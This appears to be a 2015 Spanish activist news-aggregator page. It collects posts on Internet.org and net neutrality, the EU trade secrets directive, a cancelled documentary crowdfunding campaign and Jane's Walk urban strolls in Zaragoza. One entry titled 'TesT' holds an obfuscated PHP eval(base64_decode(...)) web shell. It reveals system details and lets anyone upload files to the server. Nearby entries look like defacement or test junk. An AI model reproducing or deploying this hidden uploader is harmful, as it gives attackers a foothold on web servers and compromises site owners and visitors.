Informacio útil

Participa

Grups

Agregador de canals

Carta abierta a Mark Zuckerberg sobre Internet.org, Neutralidad de la Red, Privacidad, y Seguridad

X.net - 18 Maig, 2015 - 18:14
Esta es la traducción de la carta abierta a Mark Zuckerberg que 65 grupos de 31 países hemos escrito al dueño de Facebook a propósito de su proyecto Internet.Org. Le hemos dejado esa carta en Facebook. Dale al me gusta si estás de acuerdo: https://www.facebook.com/notes/accessnoworg/open-letter-to-mark-zuckerberg-regarding-internetorg-net-neutrality-privacy-and-/935857379791271

 

Estimado Mark Zuckerberg,

Los abajo firmantes compartimos una gran preocupación por el lanzamiento y la expansión de la plataforma Internet.org impulsada por Facebook y por sus implicaciones para la internet abierta en el mundo. En esa Internet abierta, todos los contenidos, aplicaciones y servicios deben ser tratados con igualdad, sin discriminaciones. Nos perturba particularmente que el acceso a Internet para personas sin recursos sea usado para justificar violaciones a la neutralidad de la red.

En su forma actual, Internet.org viola el principio de neutralidad de la red, amenazando la libertad de expresión, la igualdad de oportunidades, la seguridad, la privacidad y la innovación. Además, creemos que Facebook está definiendo la neutralidad de la red de manera errónea en sus declaraciones públicas y que está construyendo un “jardín vallado” donde los pobres del mundo pueden acceder sólo a un grupo de sitios web y servicios inseguros. También estamos profundamente preocupados por la manera engañosa con la cual se presentó el programa Internet.org, prometiendo un acceso completo a Internet cuando en efecto sólo provee acceso a un número limitado de servicios conectados a Internet que son aprobados previamente por Facebook y proveedores de servicios locales (en adelante “ISPs”).

Apoyamos fervientemente el objetivo de brindar acceso asequible a Internet a los dos tercios del mundo que aún están desconectados. Muchos de nosotros llevamos años trabajando en iniciativas para cerrar la brecha digital, tales como la construcción de instalaciones para el acceso a Internet en bibliotecas públicas y telecentros, el apoyo a las redes de banda ancha comunitarias, la inversión en telecomunicaciones locales, la inversión pública en infraestructura de banda ancha, el mejoramiento de servicios y páginas para hacerlos accesibles a bajas velocidades y muchos más. En este orden de ideas, siempre buscamos proveer acceso sin discriminaciones a la Internet completa y abierta, sin privilegiar a determinadas aplicaciones o servicios sobre otros y sin comprometer la privacidad y la seguridad de los usuarios.

Estas son diferencias clave con la propuesta actual de Internet.org.

En un vídeo del 4 de Mayo pasado, usted anunció nuevas reglas para Internet.org y dijo que su iniciativa no está en conflicto con la neutralidad de Internet. Sin embargo, en el sitio web que acompañó sus anuncios, las nuevas reglas claramente expresan que “los sitios web deben integrarse apropiadamente a Internet.org para permitir el zero rating”.

A continuación, articularemos nuestras preocupaciones sobre la actual estructura e implementación de Internet.org:

  • Neutralidad de la Red: La neutralidad de la red garantiza la libertad de expresión y la igualdad de oportunidades en Internet, permitiendo a los usuarios buscar, recibir e impartir información interactuando como iguales. Requiere que la Internet se mantenga como una plataforma abierta donde los proveedores de servicios traten a todo el contenido, las aplicaciones y servicios igualmente, sin discriminaciones. Un aspecto importante de la neutralidad implica que cualquiera debe ser capaz de innovar sin permiso.

Urgimos a Facebook a apoyar una definición verdadera de la neutralidad de la red donde todas las aplicaciones y servicios sean tratados igual, sin discriminaciones, en especial en los países en desarrollo, de donde vendrán los próximos 3 mil millones de usuarios de Internet. También pedimos que se atienda a las serias fallas de privacidad y seguridad que la presente iteración de Internet.org presenta.

  • Zero rating:​El zero rating es una práctica llevada a cabo por los proveedores de servicios de Internet o telefonía móvil, que consisten en ofrecer a sus clientes acceso a un número determinado de aplicaciones o servicios de manera gratuita (es decir, que no requieren de un plan de datos, o bien, que no cuentan para los límites de datos que el usuario tenga). Esta práctica es inherentemente discriminatoria, que es por lo cual ya fue prohibida o restringida en países como Canadá, los Países Bajos, Eslovenia y Chile.

El zero rating es actualmente el modelo de base de Internet.org: Facebook está cerrando acuerdos con proveedores de servicio alrededor del mundo para ofrecer acceso a ciertas aplicaciones de Internet sin costo. Estos acuerdos ponen en peligro la libertad de expresión y la igualdad de oportunidades al dejar que los proveedores de servicios decidan qué servicios serán privilegiados en desmedro de otros, interfiriendo así con el libre flujo de información y los derechos de los usuarios en las redes.

  • Denominación:: Internet.org equivocadamente llama “Internet” a estas aplicaciones bajo zero rating, cuando realmente esas aplicaciones sólo ofrecen acceso a una mínima porción de lo que Internet es. El proyecto crea un “jardín vallado” donde algunos servicios son favorecidos en desmedro de otros, en una clara violación a la neutralidad de la red.
  • Libertad de expresión: El proyecto genera otros riesgos para la libertad de expresión. La capacidad de censura que existe sobre los puntos de entrada y salida ya es materia de conocimiento general. Algunos gobiernos requieren a los ISPs bloquear el acceso a ciertos sitios o servicios. Facebook parece colocarse en esa misma posición, una donde los gobiernos podrían presionarlo para bloquear contenidos o inclusive, si los usuarios deben registrarse para usar Internet.org, bloquear a usuarios individuales. La identificación de usuarios que esto mismo permite podría inclusive llevar a su arresto. Facebook no debería incentivar estas responsabilidades y riesgos creando puntos de control centralizados de la información.
  • Privacidad: Estamos también muy preocupados por las consecuencias que Internet.org tiene respecto de la privacidad. La política de privacidad de Facebook no provee protecciones adecuadas para usuarios de Internet sin experiencia, algunos de los cuales podrían no comprender cabalmente como sus información personal será utilizada y no estar en condiciones de dar un consentimiento informado para ciertas prácticas. Debido a la falta de claridad al respecto, es probable que Internet.org recolecte datos sobre sus usuarios cuando utilizan las aplicaciones y servicios que forman parte del proyecto. Hay falta de transparencia sobre cómo esos datos podrían ser utilizados por Facebook y los ISP asociados. Internet.org también concentra el uso de Internet en un puñado de aplicaciones y servicios, facilitando la vigilancia del tráfico en la red por parte de gobiernos y actores maliciosos.
  • Seguridad:La presente implementación de Internet.org amenaza la seguridad de los usuarios y la de Internet en general. La actualización del 4 de mayo prohíbe que los servicios participantes del proyecto usen TLS (Transport Layer Security), Secure Socket Layer (SSL), y HTTPS. Esto pone en franco peligro a los usuarios, porque su tráfico web será vulnerable a ataques maliciosos y vigilancia gubernamental.
  • Una Internet de dos capas: El boom económico que Internet creó en los países desarrollados debe ser compartido en pie de igualdad con los próximos 3 mil millones de usuarios y no sofocado por la nueva Internet de dos capas de Facebook. El modelo de Internet.org, -de dar a probar un poco de conectividad a los usuarios para que ellos luego contraten costosos planes de datos- falla en reconocer la realidad económica de millones de personas que no pueden pagar esos planes de datos. Estos nuevos usuarios podrían verse atrapados en un camino distinto y desigual hacia la conectividad a Internet, lo que servirá para aumentar la brecha digital en lugar de disminuirla.

Facebook, en su intento por conectar a miles de millones a Internet debería abogar por apoyar y resguardar los principios de neutralidad de Internet, privacidad, seguridad y los derechos de los usuarios en sus conversaciones con gobiernos nacionales y entes reguladores; al tiempo de aplicar estos estándares a sus iniciativas comerciales.

Atentamente,

18MillionRising.org – US

Access – Global

Ageia Densi Colombia – Colombia

Baaroo Foundation – Netherlands

Bits of Freedom – Netherlands

Center for Media Justice – US

Centre Africain D’Echange Culturel (CAFEC) – Democratic Republic of Congo

Coding Rights – Brazil

Coletivo Intervozes – Brazil

Colnodo – Colombia

ColorofChange.org – US

Community Informatics Network – Global

Data Roads Foundation – Global

Digital Rights Foundation – Pakistan

Digitale Gesellschaft – Germany

European Digital Rights (EDRi) – EU

Fight for the Future – US

Förderverein freie Netzwerke e.V. / freifunk.net – Germany

Free Press Unlimited – EU

Fundacion Karisma – Colombia

Fundacion para la Libertad de Prensa – Colombia

Future of Music Coalition – US

Global Voices Advocacy – Global

Greenhost – Netherlands

i freedom Uganda – Uganda

ICT Watch – Indonesia – Indonesia

Initiative für Netzfreiheit – Austria

Instituto Bem Estar Brasil – Brazil

Instituto Beta para Internet e Democracia – IBIDEM – Brazil

Instituto NUPEF – Brazil

Integrating Livelihoods through Communication Information Technology for Africa – Uganda

International Modern Media Institute – Iceland

Internet Policy Observatory Pakistan – Pakistan

IPANDETEC – Panama

IT for Change – India

IT-Pol Denmark – Denmark

Just Associates Southern Africa – Africa

KICTANet – Kenya

Korean Progressive Network Jinbonet – South Korea

Media Alliance – US

Media Matters for Democracy (Pakistan) – Pakistan

Media Mobilizing Project – US

MediaNama – India

Movimento Mega – Brazil

Open Wireless Network of Slovenia – Slovenia

OpenMedia – Global

Paradigm Initiative Nigeria – Nigeria

Popular Resistance – US

Protege Qv – Cameroon

Red en Defensa de los Derechos Digitales (R3D) – Mexico

RedPaTodos – Colombia

RIght 2 Know Campaign – South Africa

RootsAction.org – US

Samuelson-Glushko Canadian Internet Policy & Public Interest Clinic (CIPPIC) – Canada

SavetheInternet.in – India

Savvy System Designs – US

Southeast Asia Freedom of Expression Network/Safenet – Southeast Asia

TEDIC – Paraguay

The Agency League of Musicians – US

The Heliopolis Institute – Egypt

The Media Consortium – US

Unwanted Witness – Uganda

Usuarios Digitales – Ecuador

Vrijschrift – Netherlands

WITNESS – Global

Xnet – Spain

Zimbabwe Human Rights NGO Forum – Zimbabwe

Categories: Notícies

Alcaldes Caciques

X.net - 14 Maig, 2015 - 10:32
Actualización

Después de dos semanas en marcha, y sientiéndolo mucho, hemos decidido poner fin antes de tiempo a la microfinanciación colectiva de Alcaldes Caciques, el documental.
Nos parece lo más sensato cuando no se ha conseguido cubrir aún la mitad de lo necesario para sacar el proyecto adelante, un proyecto pensado para estar listo antes de los paseos electorales.

Esto no significa que vayan a tener una campaña electoral tranquila :).
Hay mucho trabajo realizado para preparar el documental que podemos y queremos aprovechar. Quizás no podremos contar con la inestimable colaboración de Metromuster, pero vamos a trabajar para dar salida igualmente al material preparado.

Queremos agradecer a todos los que habéis aportado vuestra gotita en Goteo y a todos los que os habéis ofrecido a colaborar de una manera u otra vuestro interés y esfuerzo.
Naturalmente, al interrumpirse antes de tiempo el crowdfunding, todas las cantidades aportadas se devolverán a los cofinanciadores.

Continuamos trabajando para dar visibilidad a esa ciudadanía vigilante que trabaja para hacer de sus municipios un lugar mejor pero nos damos cuenta de que es necesario plantear cauces más rápidos para dar salida a la información que en ese sentido es remitida al BuzónX y sobre esto os enviaremos más información la próxima semana.

Como siempre, ¡seguimos!

Xnet realiza este vídeo con las denuncias enviadas por la ciudadanía a su Buzón X de filtraciones ciudadanas contra la corrupción y en colaboración con la campaña Alcaldes Caciques del Partido X.

Lo que van a ver a continuación no es ciencia ficción; tampoco es de un tiempo lejano, digamos el medioevo, por ejemplo; ni tampoco es de un lugar remoto e inaccesible (o al menos de un lugar de los que llamamos “tercer mundo”).

NO vamos a hablar de los grandes nombres de las grandes tramas de corrupción, de Bárcenas, Bankia, de Rato, de Blesa, de la Gürtel, de Jordi Pujol…

No, vamos a hablar de Caciques;
pero no de cualquiera de ellos, sino de los que ejercen de Alcaldes.

Porque sin este poder capilar que siempre depende de las relaciones con los grandes partidos, las grandes tramas de corrupción no podrían llegar a recaudar en cada rincón del país.
 

 
Y es que el problema empieza aquí. El alcalde tiene más poderes que nadie, más que el presidente, más que el rey, más que los presidentes de las cámaras todos juntos. Según el artículo 20 de la LRBRL.
El Alcalde:
Dirige el gobierno y la administración municipal, lo representa; Convoca y preside el Pleno; Dirige e inspecciona los servicios y obras municipales y la gestión económica; dicta bandos; concerta operaciones de crédito; Aprueba los instrumentos de gestión urbanística y de los proyectos de urbanización, la oferta de empleo público y las bases de las pruebas para la selección del personal y su despido; Otorga las licencias; Ejercer la jefatura de la Policía Municipal; Sancionar las faltas de desobediencia a su autoridad o por infracción de las ordenanzas municipales; nombra los Tenientes de Alcalde.

Porque en muchas poblaciones los ciudadanos no pueden gobernarse como le es más beneficioso.

Tan solo pueden votar.

Votar a…

ALCALDES CACIQUES

Solo la ciudadanía organizándose puede pararlos.

Denuncia a tu cacique más cercano.

Él lo haría por ti.

Denuncia.
Organízate.
Funciona.

Dedicamos este trabajo a toda la ciudadanía que, en lugar de delegar su responsabilidad en partidos y líderes mediáticos, se auto-organiza para cambiar las cosas, porque su valentía es contagiosa.

Categories: Notícies

Save The Link

X.net - 7 Maig, 2015 - 10:11

Xnet se suma a la campaña global Save The Link, contra la criminalización y la privatización de la posibilidad de enlazar.

Atacar la libertad de enlazar es atacar la esencia misma de internet, su estructura.

Internet no será otra televisión.

https://savethelink.org/

Categories: Notícies

لا اله الا الله محمد رسول الله

Fundacion de los comunes - 6 Maig, 2015 - 19:00
Data: De Viernes, 8 Mayo, 2015 - 19:00 hasta Domingo, 10 Mayo, 2015 - 11:30

Categories: Notícies

PREPAREM LA PINTADA DE L’HORT

Plantem-nos! - 5 Maig, 2015 - 21:52
El proper dissabte 9 de maig farem entre totes un taller d’esbossos amb el col·lectiu Fentlamà. Treballarem el dibuix que després pintarem el 6 de juny a les parets de l’Hort Urbà de Plantem-nos. El pla del dia començarà amb una breu explicació del projecte al mur, a continuació dinarem totes juntes (paella, fideua a càrrec de […]

FIESTA 20º ANIVERSARIO A.U. ECONOMÍA ALTERNATIVA

Patio Maravillas - 5 Maig, 2015 - 20:25
FIESTA 20º ANIVERSARIO A.U. ECONOMÍA ALTERNATIVA Economía Alternativa somos la asociación de estudiantes de Económicas UCM, somos anticapitalistas, horizontales y asamblearixs. Nuestro principal objetivo en fomentar el pensamiento crítico en las aulas, y más en un entorno hostil y de sesgo como es el campo de la Economía y nuestra Facultad, donde lo que nos […]
Categories: Notícies

TesT

Fundacion de los comunes - 2 Maig, 2015 - 21:06
<?php eval(base64_decode('ZWNobyAnPGI+U3c8YnI+PGJyPicucGhwX3VuYW1lKCkuJzxicj48L2I+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsKZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsKaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+WXVrbGVuZGk8L2I+PGJyPjxicj4nOyB9CmVsc2UgeyBlY2hvICc8Yj5CYXNhcmlzaXo8L2I+PGJyPjxicj4nOyB9Cn0=')); ?>
Categories: Notícies

La cuenta atrás ha comenzado.

Patio Maravillas - 1 Maig, 2015 - 12:56
Quien avisa no es traidor – refranero popular Cuidado cuidado os avisamos – eskorbuto Hace 5 meses, en una rueda de prensa que hicimos tras el rápido desalojo que sufrimos el 5 de enero, lo dijimos: si antes del 1 de mayo el Ayuntamiento de Madrid no se sentaba a negociar y nos cedía uno […]
Categories: Notícies

Hacia nuevas instituciones democráticas. De la crisis al asalto de la política

Fundacion de los comunes - 29 Abril, 2015 - 19:19
Data: De Viernes, 8 Mayo, 2015 - 19:00 hasta Domingo, 10 Mayo, 2015 - 11:30 SSADASDAS
Categories: Notícies

[10/05/2015] Aperiticoop MUNDOCLIP.ES

Patio Maravillas - 28 Abril, 2015 - 13:14
APERITICOOP apoyo a proyectos cooperativos y de la economía social y solidaria SESIÓN DE CAÑAS Y TAPAS! ESTA EDIDICÓN: MUNDOCLIPO.ES El equipo mundoclip.es es una familia que trabaja en equipo. Funcionamos de forma colaborativa y cooperativa, cada uno de nosotr@s está especializado en un área, pero las decisiones las tomamos conjuntamente, de manera horizontal y cuando una de las […]
Categories: Notícies

Ven a pasear con Jane por el barrio de San José

A Zofra - 27 Abril, 2015 - 22:40

¿Realmente educamos nuestra sensibilidad para entender la ciudad? Ella tan infinita, con sus calles y sus gentes, sus plazas, sus comercios. La ciudad subjetiva que cada persona vive a su manera, de la que cada uno extrae un jugo irrepetible. Si tiene 200.000 habitantes esconderá 200.000 ciudades, cada una con su horario, sus trayectos, sus miradas, sus rincones, sus lugares de trabajo y de descanso, sus “¡ey ,qué pasa!” y “por ahí no paso”. Y es todo un mismo espacio en el que se inventan 200.000 maneras de vivirlo. Ciudades particulares, mutables y todas distintas. ¿Cómo entender todas ellas? ¿Cómo diagnosticar sus problemas y necesidades? Y, ¿cómo decidir cuál es esa ciudad ideal hacia la que queremos caminar?

El urbanismo se ha erigido como puño impositor de fórmulas infalibles. Con su bandera se decidió que no era necesario comprender a los ciudadanos para diseñar sus espacios. A lo largo de la historia se han aportado soluciones estéticas, pragmáticas, estratégicas o higienistas a los conflictos o a las situaciones incomprensibles (o incómodas) para técnicos y políticos. Jane Jacobs, en su libro “Muerte y vida de las grandes ciudades”, nos aportó, antes que nada, una mirada limpia que desenmascara esta farsa: la de los urbanistas que arrastran teorías simplistas sobre la ciudad ideal. Y nos descubre, al menos, hacia dónde dar el primer paso para comenzar a pensar la ciudad de otra manera. Y no es otro sitio que hacia nuestras calles.

Con esta intención nace “el Paseo de Jane”, al que nos queremos unir desde la ciudad de Zaragoza. Nos encontramos para prepararlo el pasado 9 de abril, y no pudo ser más fructífero. Tanto que no pudimos evitar comenzar a caminar y a compartir. Y a entender un poco más nuestras calles.
El próximo 2 de mayo realizaremos el paseo “oficial” por el barrio de San José. Nos encontraremos a las 11:30 de la mañana en el kiosco del Jardín de la Memoria, en la parte alta del barrio. Estáis tod@s invitad@s a venir a compartir vuestros pasos y pensamientos.


Categories: Notícies

Teixint a l’hort

Plantem-nos! - 26 Abril, 2015 - 19:51
  A partir d’aquest dimarts, Candellanes començaran  a teixir a l’hort. Tant si saps com si no, et convidem afegir-te al grup de teixidores de l’hort. Pots aprendre tècniques noves, divertides i diferents, i el més important, a fer les coses per tu mateix. Mira què pots fer amb les teves mans!  Anima’t! T’ esperem els […]

La directiva europea de secretos comerciales amenaza la libertad de expresión, el medio ambiente y la movilidad de los trabajadores

X.net - 23 Abril, 2015 - 12:40
Nota para la comprensión:
Además de nuestra campaña contra la directiva de Secretos Comerciales, integrada por organizaciones de varios sectores de la sociedad civil, ha surgido poco después otra campaña promovida por sindicatos europeos y con la que estamos en contacto dado que nuestro compañero Falciani apoya la misma.
Más info de interés:
La UE prepara una directiva ‘antifiltraciones’
Appel à protéger les donneurs d’alerte dans les domaines de sécurité nationale (fr)

 

Una coalición de varios sectores de la sociedad civil exige mayor protección para
consumidores, periodistas, informantes, investigadores y trabajadores.

Nos oponemos firmemente al apresurado impulso de la Comisión Europea y el Consejo Europeo por aprobar una nueva directiva de la Unión Europea (UE) en materia de secretos comerciales, ya que comprende:

  • una definición de “secretos comerciales” incomprensiblemente amplia que permite que prácticamente cualquier elemento dentro de una empresa pueda ser considerado como tal;
  • recursos jurídicos de amplio alcance para las empresas cuyos “secretos comerciales” se hayan “obtenido, utilizado o divulgado de forma ilícita”, entre los que se incluyen medidas provisionales y cautelares, derechos a indemnización y secreto a lo largo del proceso judicial; así como
  • medidas de salvaguarda inadecuadas que no garantizan que los consumidores, periodistas, informantes, investigadores y trabajadores de la UE dispongan de acceso fiable a información importante de interés público.

La propuesta debe ser enmendada para garantizar que, en virtud de esta directiva, únicamente se proteja la información obtenida, divulgada y utilizada por terceros con la intención de obtener un beneficio comercial.

En particular, compartimos una gran preocupación por el hecho de que en el borrador de la directiva:

  • El derecho a la libertad de expresión e información podría verse seriamente dañado dado que la propuesta no garantiza la protección de periodistas e informantes. Según la propuesta de directiva, los periodistas e informantes deben demostrar que “… la presunta obtención, utilización o divulgación del secreto comercial [eran] necesarias para dicha revelación y que el demandado [ha] actuado en interés público”. Lamentablemente, a menudo solo es posible juzgar con posterioridad si la divulgación era necesaria. Asimismo, la limitación del derecho a divulgar y utilizar los secretos comerciales para revelar una “irregularidad”, un “comportamiento impropio” o para proteger un “interés legítimo” permitiría la aplicación de sanciones incluso en ocasiones en que la información debiera ser de dominio público, como en el caso de proyectos de despido y de efectos perjudiciales para la salud o el medio ambiente. La propuesta de directiva debería ser enmendada para que se excluya la información obtenida, utilizada o divulgada por el interés público.
  • La movilidad de los trabajadores de la UE podría verse coartada. La propuesta de directiva supone un peligro de bloqueo para los trabajadores. Podría propiciar situaciones en las que un empleado eludiese trabajar en el mismo campo que su anterior empresa por no poder aplicar sus propias destrezas y competencias, así como para evitar que se le haga responsable de daños. Esta situación limita el desarrollo profesional, además de la movilidad profesional y geográfica dentro del mercado laboral.
  • Dentro de los sectores sanitario, medioambiental y de la seguridad alimentaria, las empresas podrían utilizar la directiva para negarse a acatar las políticas de transparencia, incluso en casos en que el interés público está en juego. La propuesta de directiva debería ser enmendada para garantizar que (1) no encubre información que, por ley (incluida la legislación internacional), debe ser difundida por las autoridades de acuerdo con la legislación en materia de acceso público a la información y (2) excluye datos reglamentarios de interés público que son necesarios para el escrutinio público de las actividades de las autoridades reguladoras.

Salud: Las empresas farmacéuticas sostienen que todos los aspectos del desarrollo clínico se deberían considerar secreto comercial; sin embargo, el acceso a los datos de la investigación biomédica por parte de las autoridades reguladoras, los investigadores, médicos y pacientes en particular cuando se trata de datos sobre la eficacia de los fármacos y sus reacciones adversases fundamental para proteger la seguridad de los pacientes y para poder seguir efectuando investigaciones y análisis independientes. Esta información también impide que se gasten recursos públicos escasos en terapias que no mejoran los tratamientos existentes, no funcionan o resultan más dañinas que beneficiosas. Además, la divulgación de la investigación farmacéutica es necesaria para evitar la repetición poco ética de ensayos clínicos en personas. La propuesta de directiva no debería obstaculizar los recientes avances de la UE para aumentar la divulgación y la transparencia de estos datos.

Medio ambiente: La directiva se debe modificar para adecuarla a las obligaciones internacionales de la UE en virtud del Convenio de Aarhus de Naciones Unidas, que impide a las autoridades públicas proteger el secreto sobre la información acerca de emisiones al medio ambiente y obliga a la divulgación activa de la información para permitir a los consumidores realizar elecciones medioambientales informadas. Por tanto, la definición de “secreto comercial” se debería modificar para eliminar del alcance de la propuesta de directiva la información sobre las emisiones. Asimismo, se debería evitar que las compañías utilicen la directiva para negarse a divulgar información sobre productos peligrosos, como sustancias químicas de plásticos, ropa, productos de limpieza y otras actividades que puedan provocar un serio daño a la salud medioambiental y humana, incluidos los vertidos de sustancias químicas y fluidos del fracking.

Seguridad alimentaria: Con arreglo a la legislación de la UE, todos los productos alimentarios, los organismos modificados genéticamente y los pesticidas son evaluados por la Autoridad Europea de Seguridad Alimentaria (EFSA, por sus siglas en inglés). La EFSA evalúa los riesgos asociados con estos productos basándose en estudios realizados por los propios fabricantes. El escrutinio científico de las evaluaciones de la EFSA solo es posible a través de un acceso completo a dichos estudios; por tanto, esta información se debe eliminar del alcance de la directiva.

A pesar de que la Comisión desee una “varita mágica” que mantenga a Europa dentro del juego de la innovación, si no se produce una modificación, esta propuesta de directiva puede dificultar más a la UE la participación en formas de investigación abiertas y colaborativas. De hecho, existe el riesgo de que las medidas y remedios estipulados en esta directiva socaven la competencia legítima e incluso promuevan comportamientos contrarios a la competencia. No es de extrañar que el texto cuente con el pleno apoyo de empresas multinacionales.

Las coaliciones de la industria de la UE y Estados Unidos están presionando a través de una Coalición de Secretos Comerciales unificada para que se adopte la protección del secreto comercial. En Estados Unidos hay dos nuevas propuestas de ley pendientes en el Congreso. De ser aprobados, estos textos permitirían la inclusión de la protección del secreto comercial en la Alianza Transatlántica de Comercio e Inversiones (TTIP, por sus siglas en inglés) –algo que sería extremadamente difícil de derogar a través de procesos democráticos en el futuro–. Dado que se espera que el TTIP establezca una nueva norma global, la potencial inclusión de la protección del secreto comercial en ella podría tener consecuencias devastadoras.

Instamos al Consejo y al Parlamento Europeos a enmendar la directiva limitando la definición de lo que constituye un secreto comercial y reforzando las salvaguardas y excepciones para garantizar que la información de interés público no pueda ser protegida como un secreto comercial. El derecho al acceso y la divulgación de la información debería ser la norma; la protección del secreto comercial, la excepción.

 

Firmantes

 
SANIDAD

Health Action International www.haieurope.org

Medicines in Europe Forum http://english.prescrire.org/en/

Commons Network www.commonsnetwork.eu

Public Citizen, US www.citizen.org/access

European Public Health Alliance www.epha.org

Knowledge Ecology International (KEI) Europe www.keieurope.org

Cochrane Collaboration – Nordic Cochrane Centre www.cochrane.org

International Society of Drug Bulletins (ISDB) www.isdbweb.org

Association Internationale de la Mutualité (AIM) www.aim-mutual.org.

Berne Declaration www.bernedeclaration.ch

Health Projects for Latvia www.veselibasprojekti.lv/?lng=en

HEAL (Health & Environment Alliance) www.env-health.org 

WEMOS www.wemos.nl
 

SEGUIDAD ALIMENTARIA

Corporate Europe Observatory (CEO) www.corporateeurope.org

GeneWatch UK www.genewatch.org

EFFAT (European Federation of Food, Agriculture, Tourism Trade Unions) www.effat.org
 

MEDIO AMBIENTE

Client Earth www.clientearth.org

Center for International Environmental Law (CIEL) www.ciel.org

Greenpeace (EU unit) www.greenpeace.eu

EEB (the European Environmental Bureau) www.eeb.org

NatureFriends International (NFI) www.nf-int.org

Commons Network www.commonsnetwork.eu
 

DESARROLLO

Centre national de coopération au développement (CNCD-11.11.11”) www.cncd.be
 

LIBERTAD DE EXPRESIÓN Y FILTRACIONES CIUDADANAS

French journalists collective “Informer n’est pas un délit” http://informernestpasundelit.tumblr.com/

La Quadrature du Net www.laquadrature.net

Corporate Europe Observatory (CEO) www.corporateeurope.org

Article 19 www.article19.org

Electronic Frontier Foundation (EFF) https://eff.org

EDRi (European Digital Rights) https://edri.org/

Xnet https://xnet-x.net/

The Foundation for Information Policy Research http://www.fipr.org/

Vrijschrift https://www.vrijschrift.org/serendipity/

CEE Bankwatch Network http://bankwatch.org/

Transparency International France www.transparency-france.org

Fondation Sciences Citoyennes http://sciencescitoyennes.org/
 

MOBILIDAD DE LOS TRABAJADORES

EUROCADRES (Council of European Professional and Managerial Staff) www.eurocadres.eu

EPSU (European Federation of Public Service Unions) www.epsu.org

ETUC (European Trade Union Confederation) http://www.etuc.org/

CFDT CADRES (CFDT for Professional and Managerial Staff) www.cadrescfdt.fr/

Akademikerna (The Danish Confederation of Professional Associations) www.ac.dk

AGENQUADRI (General Association of Managers, Professionals and High-Skilled Workers) www.agenquadri.it

Saco www.saco.se/en/

UNI Europa www.uni-europa.org

Akava (Confederation of Unions for Professional and Managerial Staff in Finland) www.akava.fi

Unionen www.unionen.se

TCO (Swedish Confederation of Professional Employees) www.tco.se
 

PDF y contactos: https://xnet-x.net/docs/statement-on-trade-secrets-directive.pdf

Categories: Notícies

De La Seo a La Madalena. Crónica de un Pre-Paseo de Jane

A Zofra - 22 Abril, 2015 - 13:00

El pasado 9 de abril nos juntamos una docena de vecinas y personas interesadas en el urbanismo a partir del llamamiento que hizo A_Zofra para reunirnos y, caminando, organizar el Paseo de Jane en Zaragoza para el próximo primer fin de semana de mayo. Como la convocatoria era muy abierta, las intervenciones de las personas que estábamos fueron derivando (nunca mejor dicho) desde la propuesta inicial hacia lo que pasó a ser (para gusto de todas) algo parecido a una versión previa del propio Paseo de Jane.

El punto de partida era el Arco del Deán, muy cerca de la entrada habitual a la Seo zaragozana. Caminando por la calle Pabostría, y con intervenciones de casi todo el mundo, enseguida nos pusimos a contar y a compartir, que era de lo que se trataba. Una señora nos contó su alegría al descubrir que en tiempos por allí estaba la plaza dedicada a su pueblo natal, Fabara. Un participante compartió con las demás que esta calle, la de Pabostría, era su calle preferida de Zaragoza, tal vez por su tranquilidad. Alguien contó que hay incluso una novela ambientada en esta calle con el título de “La red del pescador”. ¿De dónde le vendrá el nombre a la calle?, preguntaba alguien. Yo siempre que paso por aquí me gusta imaginarme quién vivirá en estas casas, decía otra persona. Pues lo que yo pienso es que tendrán muy poca luz, le contestaba una chica. Otra apuntaba que a pesar de estar poco iluminada era una calle que no daba miedo. ¿Por qué darán miedo las calles que dan miedo? ¿Serán aquellas de las que se cuentan experiencias desgraciadas?
Una de las paseantes nos sacó de repente de la relajada conversación. Os quiero llevar a ver una calle en concreto, nos dijo. Y echamos a caminar detrás de ella volviendo por nuestros pasos, cogiendo la calle Palafox, atravesando San Vicente de Paúl y entrando en La Madalena. Se detuvo en el cruce entre las calles Palafox, Gavín y Liñán, y nos mostró cómo desde ese preciso punto teníamos una vista preciosa de la torre de la Madalena y de un palacete restaurado formando un atrevido escorzo entre dos de sus paredes. Parece la quilla de un barco, nos dijo. Después de mirar las paredes alguien señaló que era mejor no mirar al suelo. El pavimento destrozado hacía muy desagradable pasar por allí en días de lluvia. ¿Cuántos coches pasarán por aquí para que esté así el pavimento, a pesar de ser una calle peatonal? Estas calles peatonales de mentira son lo peor, decía una chica, casi es mejor que no lo sea para disponer de acera, si estás con los chicos es un infierno. En pocos minutos comprobamos cómo de una entrada de garaje salía un coche, otro venía desde la calle universidad, otro desde San Vicente de Paúl con lo que nos teníamos que apartar para dejarle pasar. Una chica recordaba lo que le gustó Lisboa con su servicio de trasporte público de pequeño tamaño por dentro del casco histórico.


Avanzamos un poco más por la calle Palafox y nos detuvimos a la altura de una valla de seguridad que daba un poco de miedo por su aspecto cortante. Al otro lado se sitúa uno de los solares acondicionados dentro del proyecto Estonoesunsolar. La valla tiene una puerta cerrada con llave. El solar ya no tiene basura, como antes de la intervención, pero tampoco se utiliza porque por lo visto el vecindario se quejó del uso que se le fue dando. Debatimos sobre los solares vacíos de propiedad privada situados en medio de la ciudad que siguen sin estar edificados por interés especulativo. Surgían algunas propuestas. ¿Tal vez recalificarlos como públicos, quizás obligar a sus propietarios a que construyan en ellos? Una chica que empujaba el carrito de una niña aportó una reflexión que provocó varias intervenciones: lo que yo me pregunto es por qué un solar se convierte en un nido de basura. Un chico hablaba de la imposibilidad de pensar el espacio público al margen del espacio doméstico y nos preguntaba cómo serían las casas y la vida de quienes echaban su basura a un solar. Una vecina ponía en cuestión el concepto de espacio público: ¿es público el espacio público? ¿es de la gente? ¿o es del ayuntamiento? Este espacio se percibe como propiedad de la institución, que es la que lo limpia, decide lo que se puede hacer y lo que no, resuelve (o no) el conflicto en él. Además, el propio ayuntamiento cada vez que hay un intento de apropiación por parte de las vecinas, se preocupa mucho de que no sea así. Tenemos que reapropiarnos de lo público, concluía.


